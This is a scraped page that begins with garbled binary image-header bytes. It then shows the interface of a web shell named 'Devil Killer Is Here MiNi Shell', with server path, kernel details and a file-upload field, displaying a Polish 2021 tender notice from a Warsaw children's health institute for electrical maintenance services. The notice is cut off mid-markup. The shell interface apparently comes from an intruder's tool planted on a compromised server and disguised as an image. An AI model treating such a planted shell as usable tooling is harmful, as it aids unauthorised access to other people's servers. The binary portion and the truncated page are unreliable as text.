JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210528/0006813401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00068134 z dnia 2021-05-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ZP/CZD/071/21 Usługa konserwacji, eksploatacji, montażu i napraw instalacji i urządzeń w branży elektrycznej budynków IPCZD </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Pomnik-Centrum Zdrowia Dziecka</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000557961</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Dzieci Polskich 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">04-730</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@ipczd.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.czd.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZP/CZD/071/21 Usługa konserwacji, eksploatacji, montażu i napraw instalacji i urządzeń w branży elektrycznej budynków IPCZD </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-14965d10-bd4a-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00068134</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ipczd.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ipczd.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie o udzielenie zamówienia publicznego prowadzone jest w języku polskim.2. Środkiem<br/>komunikacji elektronicznej, przy użyciu którego zamawiający będzie komunikował się z wykonawcami<br/>jest platforma (Marketplanet): https://ipczd.ezamawiajacy.pl We wszelkiej korespondencji związanej z<br/>niniejszym postępowaniem zamawiający i wykonawcy posługują się nr sprawy ZP/CZD/071/21. <br/>3.<br/>Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia akceptuje warunki<br/>korzystania z w/w platformy i obowiązujących Regulaminów dostępnych na stronie<br/>https://oneplace.marketplanet.pl/regulamin 4. Wymagania techniczne i organizacyjne sporządzenia,<br/>wysyłania i odbierania korespondencji elektronicznej opisane zostały w instrukcji dla wykonawcy<br/>dostępnej na platformie. 5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania<br/>komunikatów i wiadomości bezpośrednio na platformie Marketplanet: https://ipczd.ezamawiajacy.pl<br/>przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie<br/>może trafić do folderu SPAM.6. Sposób sporządzenia oraz sposób przekazywania ofert, oświadczeń, o<br/>których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych<br/>środków dowodowych, oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w<br/>postępowaniu o udzielenie zamówienia, wymagania techniczne dla dokumentów elektronicznych,<br/>wymagania techniczne i organizacyjne użycia środków komunikacji elektronicznej służących do<br/>odbioru dokumentów elektronicznych określa Rozporządzenie Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia (Dz.U. 2020 poz. 2452).7. W postępowaniu o udzielenie<br/>zamówienia korespondencja odbywa się elektronicznie za pośrednictwem platformy (Marketplanet)<br/>https://ipczd.ezamawiajacy.pl 8. Dokumenty elektroniczne przekazuje się przy użyciu środka<br/>komunikacji elektronicznej, którym jest platforma (Marketplanet) https://ipczd.ezamawiajacy.pl.9.<br/>Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.10. Jeżeli<br/>wniosek o wyjaśnienie treści SWZ wpłynie do Zamawiającego nie później niż na 4 dni przed upływem<br/>terminu składania ofert, Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni<br/>przed upływem terminu składania ofert. Jeżeli wniosek o wyjaśnienie treści SWZ wpłynie po upływie<br/>terminu, o którym mowa powyżej, Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz<br/>obowiązku przedłużenia terminu składania ofert. Zamawiający zamieści wyjaśnienia na stronie<br/>internetowej, na której udostępniono SWZ.11. Przedłużenie terminu składania ofert nie wpływa na bieg<br/>terminu składania wniosku, o którym mowa powyżej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNAdotycząca przetwarzania<br/>danych osobowych w postępowaniach o udzielenie zamówienia publicznego ogłaszanych przez<br/>Instytut „Pomnik - Centrum Zdrowia Dziecka”Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływ takich danych oraz<br/>uchylenia Dyrektywy 95/46/WE (zwanego „RODO'') informujemy Państwa, że:1. Administratorem<br/>Państwa danych osobowych (dalej, jako: „Administrator Danych Osobowych”) jest Instytut „Pomnik-<br/>Centrum Zdrowia Dziecka” z siedzibą w Warszawie (04-730), przy Al. Dzieci Polskich 20, wpisanym do<br/>rejestru przedsiębiorców prowadzonego przez Sąd Rejonowy dla m. st. Warszawy w Warszawie, XIII<br/>Wydział Gospodarczy KRS, pod nr 0000092381, NIP 952-11-43-675, REGON 0005579612. W<br/>instytucie został wyznaczony Inspektor Ochrony Danych, z którym można skontaktować się poprzez<br/>adres email iod@ipczd.pl lub pisemnie na adres Administratora Danych.3. Państwa dane osobowe<br/>będą przetwarzane na podstawie art. 6 akapit 1 lit f) RODO.4. Przetwarzanie Państwa danych<br/>osobowych odbywa się w celu zawarcia i realizacji umowy, której stronę Państwo reprezentują.5.<br/>Państwa dane osobowe są lub mogą być przekazywane następującym kategoriom odbiorców:a)<br/>dostawcom usług zaopatrującym Administratora Danych Osobowych w rozwiązania techniczne oraz<br/>organizacyjne umożliwiające zarządzanie organizacją Administratora Danych Osobowych b)<br/>dostawcom usług prawnych oraz wpierającym Administratora Danych Osobowych w dochodzeniu<br/>należnych roszczeń.c) instytucjom państwowym upoważnionym z mocy prawa.6. Administrator Danych<br/>Osobowych przechowuje Państwa dane osobowe przez okres 14 lat.7. Podanie przez Państwa danych<br/>osobowych jest dobrowolne. Nie podanie danych uniemożliwi zawarcie i wykonanie umowy.8.<br/>Przysługują Państwu następujące uprawnienia: prawo do żądania od Administratora Danych<br/>Osobowych dostępu do swoich danych osobowych, prawo do sprostowania, usunięcia danych,<br/>ograniczenia przetwarzania danych osobowych oraz prawo do przenoszenia danych osobowych, a<br/>także prawo do cofnięcia zgody na przetwarzanie danych osobowych w dowolnym momencie w<br/>zakresie, w jakim Państwa dane osobowe są przetwarzane na podstawie udzielonej zgody na<br/>przetwarzanie danych osobowych; wycofanie zgody pozostaje bez wpływu na zgodność z prawem<br/>przetwarzania, którego dokonano na podstawie Państwa zgody przed jej wycofaniem. W celu<br/>skorzystania z powyższych praw, należy skontaktować się poprzez kanały komunikacji wskazane w pkt<br/>1 i 2 powyżej.9. Państwa dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w<br/>tym profilowaniu. 10. Przysługuje Państwu prawo do wniesienia skargi do organu nadzorczego w<br/>zakresie przetwarzania danych osobowych, tj. Prezesa Urzędu ochrony Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/CZD/071/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługi w zakresie konserwacji, eksploatacji, montażu i napraw instalacji i urządzeń branży<br/>elektrycznej IPCZD.Zakres prac zlecanych na bieżąco w branży elektrycznej:1. Modernizacje<br/>instalacji elektrycznych: stacji, rozdzielni, siłowych, oświetleniowych, sygnalizacyjnych 2.<br/>Usuwanie wszelkich awarii / usterek w systemie elektroenergetycznym w trybie<br/>natychmiastowym. System obejmuje:- dwusekcyjną rozdzielnię 15 kV,- zasilacze UPS-y – 8<br/>szt.,- agregaty prądotwórcze - 6 szt. ,- stacje trafo - 6 szt.- rozdzielnie budynkowe n.n. - 19 szt.,-<br/>rozdzielnice piętrowe i obszarowe - 214 szt.,- linie kablowe 15 kV i n.n.,- układy do kompensacji<br/>mocy biernej - 12 szt,- układy zasilające pomieszczenia grupy 2,- układy zasilające 24 V - 10<br/>szt..3. W przypadku wystąpienia możliwości utraty ciągłości zasilania zapewnienie zasilania<br/>tymczasowego. 4. Montaż nowych instalacji: oświetleniowych, gniazd wtykowych, sieci<br/>komputerowych, telefonicznych, sygnalizacyjnych, układów IT5. Naprawy sprzętu AGD.6. Prace<br/>pomiarowe: ochrony przeciwporażeniowej, natężenia oświetlenia, rezystancji uziemienia itp.7.<br/>Wykonanie wszelkich innych czynności niezbędnych do zapewnienia funkcjonowania instalacji i<br/>urządzeń elektrycznych budynków Instytutu, które nie wymagają zastosowania dodatkowych sił i<br/>środków i nie wykraczają poza obiekty objęte obsługą,8. Wykonania zaleceń wynikających z<br/>przeglądów, warunków pracy/ kontroli jednostek zewnętrznych/ nakazów.9. Przestrzeganie<br/>przepisów BHP i PPOŻ w szczególności.10. Utrzymanie w czystości i porządku obsługiwanych<br/>miejsc wraz z szachtami.11. Zabezpieczanie miejsca awarii przed dostępem osób trzecich i<br/>niezwłocznie przystąpić do jej usuwania12. Czyszczenia opraw i lamp oświetleniowych dwa razy<br/>do roku lub w razie potrzeby.13. Sporządzanie i dostarczenie protokołów/kart pracy z<br/>wykonanych pomiarów, przeglądów i innych prac wraz z odpowiednio wszelkimi informacjami<br/>oraz zaleceniami, wnioskami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50711000-2 - Usługi w zakresie napraw i konserwacji elektrycznych instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50800000-3 - Różne usługi w zakresie napraw i konserwacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na usunięcie awarii / usterki</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek:<br/>1	- jeżeli wykaże, że zrealizował bądź realizuje w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi polegające na naprawie i/lub montażu i/lub konserwacji instalacji elektrycznych w obiektach użyteczności publicznej, o łącznej wartości nie mniejszej niż 200 000,00 zł brutto.<br/>2- jeżeli skieruje do realizacji zamówienia publicznego min. 4 osoby posiadające aktualne uprawnienia kwalifikacyjne wymagane przy wykonywaniu eksploatacji urządzeń, instalacji oraz sieci energetycznych zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. 2003 nr 89 poz. 828) oraz posiadające znajomość obsługi agregatu prądotwórczego i instalacji zasilania awaryjnego z baterii akumulatorów i UPS oraz znajomość obsługi układów Samoczynnego Załączania Rezerwy, z których co najmniej:<br/>- dwie osoby posiadają uprawnienia „D” grupa 1 – dla urządzeń wyszczególnionych w SWZ, p. III odpowiednio poz.: 1, 2 do 15 kV, 3 - 11 do 0,4kV,<br/>- dwie osoby posiadają uprawnienia „E” grupa 1 - dla urządzeń wyszczególnionych w SWZ, p. III odpowiednio poz.: 1, 2 do 15 kV, 3 - 11 do 0,4kV. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz usług wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy;Jeżeli wykonawca powołuje się na doświadczenie w<br/>realizacji usług wykonywanych wspólnie z innymi wykonawcami ww. wykaz dotyczy usług, w których<br/>wykonaniu wykonawca bezpośrednio uczestniczył.2. Wykaz osób, skierowanych przez wykonawcę do<br/>realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Składając ofertę każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 6 000,00<br/>PLN2. Wadium może być wnoszone w jednej lub kilku następujących formach:1) pieniądzu;2)<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi<br/>gwarancjach bankowych;3) gwarancjach ubezpieczeniowych;4) poręczeniach udzielanych przez<br/>podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).W<br/>przypadku wnoszenia wadium w formie innej niż pieniądz, Wykonawca wnosi je w postaci<br/>elektronicznego oryginału dokumentu wadialnego, tj. opatrzonego kwalifikowanym podpisem<br/>elektronicznym osób upoważnionych do jego wystawienia (wystawców dokumentu) w formacie<br/>umożliwiającym Zamawiającemu odczyt dokumentu (Zamawiający nie dopuszcza możliwości<br/>złożenia dokumentu wadium np. w formacie xml). Wadium musi zostać przesłane do<br/>Zamawiającego przed terminem składania ofert. Wadium może być przesłane wraz z ofertą<br/>(skompresowane do jednego pliku). Uwaga: Z treści gwarancji/poręczenia winno wynikać<br/>bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie<br/>związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 ustawy Pzp. Treść gwarancji powinna zawierać<br/>stosowne zapisy dla skuteczności prawidłowego zabezpieczenia oferty uwzględniając postać<br/>dokumentu elektronicznego i fakt istnienia wielu oryginałów takiej postaci, w tym zapisy<br/>dotyczące warunków wygaśnięcia i zwrotu (zwolnienia) gwarancji w postaci dokumentu<br/>elektronicznego.3. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku<br/>BRE BANK nr rachunku 70 1140 1010 0000 4356 9500 1001 z dopiskiem na przelewie:<br/>ZP/CZD/071/21.4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania<br/>środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w pkt 3 powyżej,<br/>przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako<br/>ostateczny termin składania ofert).5. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w<br/>sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania<br/>ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3<br/>ustawy Pzp, zostanie odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim<br/>przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2.Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ust. 1, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 